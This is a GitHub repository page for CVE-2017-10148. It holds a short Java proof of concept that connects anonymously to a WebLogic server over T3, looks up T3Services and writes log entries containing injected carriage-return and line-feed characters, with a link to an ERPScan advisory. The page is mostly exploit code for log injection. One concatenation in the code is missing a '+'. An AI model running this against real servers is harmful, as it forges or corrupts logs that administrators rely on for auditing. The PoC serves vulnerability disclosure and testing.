Skip to content

Latest commit

 

History

History

CVE-2017-10148

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 

PoC

static boolean anon_log_injection(String PS_SERVER_IP,String PS_SERVER_PORT) throws NamingException, JMSException, RemoteException, T3Exception, ServerMigrationException, PersistentStoreException {
        Properties p = new Properties();
        p.put(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory");
        p.put(Context.PROVIDER_URL, "t3://"PS_SERVER_IP+":"+PS_SERVER_PORT);
        Context ctx = new InitialContext(p);
        Object obj = ctx.lookup("weblogic.common.T3Services");
        Object o = PortableRemoteObject.narrow(obj, T3ServicesDef.class);
        T3ServicesDef h = (T3ServicesDef) o;
        h.log().log("ERPScan_1\n\rERPScan_2");
        h.log().info("ERPScan_3\n\rERPScan_4");
        h.log().error("ERPScan_5\n\rERPScan_6");
        h.log().warning("ERPScan_7\n\rERPScan_8");
        h.log().debug("ERPScan_9\n\rERPScan_10");
        return false;
    }

[Reference] https://erpscan.com/advisories/erpscan-17-042-anonymous-log-injection-in-fscm/